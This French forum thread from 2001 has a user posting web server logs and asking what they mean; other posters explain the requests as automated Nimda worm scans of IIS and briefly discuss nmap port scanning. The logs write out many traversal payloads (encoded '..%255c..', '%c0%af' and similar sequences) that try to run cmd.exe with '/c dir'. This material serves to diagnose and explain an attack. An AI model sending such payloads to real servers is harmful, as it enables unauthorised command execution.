Que veulent dire ces logs sur un serveur Web ? Tentative de hack ? - Windows & Software
Marsh Posté le 22-12-2001 à 23:47:36
Et biensur dans les HTTPS/ERROR_LOG de la SME :
[Sat Dec 22 23:31:04 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/MSADC/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/c/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/d/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/msadc/..%5c../..%
5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd
.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..À¯../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á?../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%2f../winnt/system32/cmd.exe
Marsh Posté le 22-12-2001 à 23:49:44
On essaie juste de voir si ton serveur est pas mal configuré
Marsh Posté le 22-12-2001 à 23:51:33
Une nouvelle IP tente de se connecter :
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
une PING -a IP ne donne rien.
Le tracert :
1 47 ms 47 ms 31 ms 192.168.254.254
2 31 ms 47 ms 47 ms blackd-th1-1-a0.routers.proxad.net [212.27.32.22
1]
3 47 ms 47 ms 47 ms blackd-cbv-2-a6.routers.proxad.net [213.228.3.22
]
4 31 ms 47 ms 47 ms 195.219.53.97
5 46 ms 250 ms 47 ms if-2-0.core1.Paris2.Teleglobe.net [195.219.14.65
]
6 109 ms 109 ms 110 ms if-6-0.core1.Milan.teleglobe.net [195.219.15.134
]
7 94 ms 93 ms 94 ms if-10-0-0.bb1.Milan.Teleglobe.net [195.219.137.3
9]
8 94 ms 94 ms 93 ms ix-8-1-0.bb1.Milan.Teleglobe.net [195.219.98.138
]
9 109 ms 110 ms 390 ms pal5-mil6-racc3.seabone.net [195.22.192.206]
10 110 ms 125 ms 125 ms ibs-11adsl-it-pal5.seabone.net [195.22.196.174]
11 110 ms 125 ms 109 ms r-rm199-fa3.interbusiness.it [151.99.29.152]
12 125 ms 157 ms 156 ms r-rm98-fa4.interbusiness.it [151.99.29.217]
13 110 ms 125 ms 125 ms r-rm201-7.interbusiness.it [151.99.29.102]
14 * * * Délai d'attente de la demande dépassé.
15 187 ms 203 ms 188 ms 62.211.205.173
Marsh Posté le 22-12-2001 à 23:53:27
Verdoux, nouvelle IP ...
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
Prq l'IP change ??? Il spoofe ?
Help
Marsh Posté le 23-12-2001 à 00:06:46
Code :
|
Marsh Posté le 23-12-2001 à 00:11:56
Tu en penses quoi ? Simple scanne ?
Prq de plusieurs IP différents, avec les mêmes tentatives ?
Spoofing ?
Le mecs essaye de voir quoi ? Si il peut lancer des commandes si ct un NT ?
Marsh Posté le 23-12-2001 à 00:13:05
y a rien de louche, c des scripts qui essaient d'exploiter des failles de IIS en essayant serveur après serveur, ip après ip en essayant toutes les IPs d'un range ...
normal quoi...
nimda powa...
Marsh Posté le 23-12-2001 à 00:13:36
ReplyMarsh Posté le 23-12-2001 à 00:13:48
Groody a écrit a écrit : Tu en penses quoi ? Simple scanne ? Prq de plusieurs IP différents, avec les mêmes tentatives ? Spoofing ? Le mecs essaye de voir quoi ? Si il peut lancer des commandes si ct un NT ? |
simple scanne je sais rien mais en tout cas il a l'air de s'atarder sur ta bécanne
kaltan
Marsh Posté le 23-12-2001 à 00:14:56
Verdoux a écrit a écrit : L'autre a une IP hongroise, avec aussi un FTP ouvert. |
comment fais tu d'aprés une Ip pour savoir quels ports il a d'ouverts?
kaltan
Marsh Posté le 23-12-2001 à 00:15:32
T'as dû laisser traîner ton IP quelque part (edonkey par exemple ) et 2 gars ont cherché à voir si ils pouvaient pas creuser.
Marsh Posté le 23-12-2001 à 00:16:12
kaltan1 a écrit a écrit : comment fais tu d'aprés une Ip pour savoir quels ports il a d'ouverts? kaltan |
Je scanne les ports (avec nmap par exemple sous linux)
Marsh Posté le 23-12-2001 à 00:17:10
Verdoux a écrit a écrit : T'as dû laisser traîner ton IP quelque part (edonkey par exemple ) et 2 gars ont cherché à voir si ils pouvaient pas creuser. |
Hum... , pour une fois qu'il tourne....
3 Ip différentes quand ¨même!!! Et ils ont tous tenté de faire la même chose, regardez les URLs qui demandaient...
Marsh Posté le 23-12-2001 à 00:17:42
Verdoux a écrit a écrit : Je scanne les ports (avec nmap par exemple sous linux) |
tu aurais un soft sous windows a me conseiller (simple si possible juste pour comprendre)
merci
Marsh Posté le 23-12-2001 à 00:18:51
un super outil, qui scanne, png, etc.. NetLab
Marsh Posté le 23-12-2001 à 00:20:02
Je connais pas trop les softs de scan.
Là j'ai utilisé simplement nmap, sans bidouiller les options. D'ailleurs je maîtrise pas grand chose dans ce domaine.
Marsh Posté le 23-12-2001 à 00:27:45
Kalt, malheureusement c sous Nux.. (si tu trouves une version Win..). Je crois que j'en avais trouvé une, mais.. je pouvais pas, je sais plus prq. Incompatible, ou ct les sources, ou une conneries comme ça.
Marsh Posté le 23-12-2001 à 00:28:31
Merde Kalt, j'avais oublié que je t'en avais conseillé un .
C'est NMAP qui est sous NUX.
le Groody ...
Marsh Posté le 23-12-2001 à 00:33:34
oui jai essayé netlab mais bon pour les ports c pas trés clair
j'utilise neotrace en principe c pas possible d'obtenir l'indication des ports ouverts?
kaltan
Marsh Posté le 23-12-2001 à 00:34:22
comme dis Martinez, c pas grave c'est juste le virus nimda
c'est auomatique, c'est comme ça qu'il se propage, ça tombe les gars sont même pas au courant qu'ils sont contaminés.
ils scannent des range d'ip... t'es dedans... pas de bol
maintenant ça se calme mais il y a qq semaines en restant connecter 30 minutes, je me tapais 4 ou 5 attaques d'ips différentes. Comme je suis sous Linux, je m'en tape ça remplit juste mes logs (que j'ai séparé heureusement)
ps : scanner c'est interdit
[edtdd]--Message édité par ethernal--[/edtdd]
Marsh Posté le 23-12-2001 à 00:36:01
Bah vla la soluce .
Donc, que tente de faire ce virus ?
Bah, pareil, je risque rien. le serveur Web est sous Nux.
Marsh Posté le 23-12-2001 à 00:40:29
Encore un, mais la ligne est toute seul dans les logs...
MonDNS 62.0.113.83 - - [23/Dec/2001:00:35:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
[edtdd]--Message édité par Groody--[/edtdd]
Marsh Posté le 23-12-2001 à 00:49:48
finallement NMAP fonctionne sous 2K. Y'avais juste une DLL a déplacer
Now, ... Y'A plus qu'à comprendre comment ça fonctionne..
P:\NMAP\Nmapnt>nmapnt
Starting nmapNT V. 2.53 SP1 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )
nmap V. 2.53 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
-sT TCP connect() port scan (default)
* -sS TCP SYN stealth port scan (best all-around TCP scan)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oM <logfile> Output normal/machine parsable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
WINDOWS Interface enumeration:
No Suitible Interfaces!
Marsh Posté le 23-12-2001 à 00:53:59
tu viens juste de te faire attaquer par nimda. Si t'es a jour dans tes patch, pas de problème.
Marsh Posté le 23-12-2001 à 00:55:58
Non, pas à jour. Le poste passerelle sur lequel je suis, W2k pro SP2 IE 5.5 SP2
c tout. Je vois pas ce que pourrai me faire Nimda. Le serveur est sous Nux.
Marsh Posté le 23-12-2001 à 00:57:33
Ca aussi c Nimda ??? (Encore une IP...)
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:23 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
Marsh Posté le 23-12-2001 à 01:00:03
toutes les IP qui tentent commencent par 62.. zarb, hazard ? Y'a une zone géographique dans laquelle on est plus vérolé qu'ailleurs ?
Marsh Posté le 23-12-2001 à 01:07:18
Groody a écrit a écrit : Ca aussi c Nimda ??? (Encore une IP...) MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-" MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:23 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-" |
si ca continue avec tout une série de commande comme plus haut, oui, c'est toujours nimda. Il exécute toujours les même commandes en espérant tomber sur un server NT sans protection. Mais comme t'es sous nux, tu risque rien. Au mieux, si l'ip correspond a un serveur avec mail, préviens-les qu'ils sont verolés.
Marsh Posté le 23-12-2001 à 01:08:52
non, l'avant derniere tentative, une seule ligne, et là, que 2.
Avec des tentatives en moyennes toutes les 25 minutes on va dire, j'ai pas que ça a faire. C'est quand même allicinant...
Marsh Posté le 23-12-2001 à 01:10:57
merci en passant
[edtdd]--Message édité par Groody--[/edtdd]
Marsh Posté le 23-12-2001 à 01:11:54
une bride de réponse serait que l'utilsateur a coupé sa connexion en plein milieu d'attaque. Sinon, c'est juste un pauvre blaireau qui tente au hasard.
Marsh Posté le 22-12-2001 à 23:43:53
Salut,
Mon PC se connectant au net tourne sous 2k Pro SP2, et WinRoute Pro partage la connexion.
J'ai installé pour tests aujourd'hui une E-Smith 5.0 (SME, distri linux serveur HTTP, etc..).
Sur WinRoute, je fais du Port Mapping. Les personnes se connectant au port 80 sur mon IP publique sont renvoyées sur mon serveur Web sur le LAN.
Personne ne connait mon IP à part un ami. Dans les logs, je le vois lui, et une autre IP, et à la place d'avoir le logs de chargements du site hebergé (quelques HTM et GIF...) j'ai ceci :
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:04 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
Qui sait à quoi ça correspond ??? tentatives de hack ?
[edtdd]--Message édité par Groody--[/edtdd]
---------------
Vidéo Concorde Air France | www.kiva.org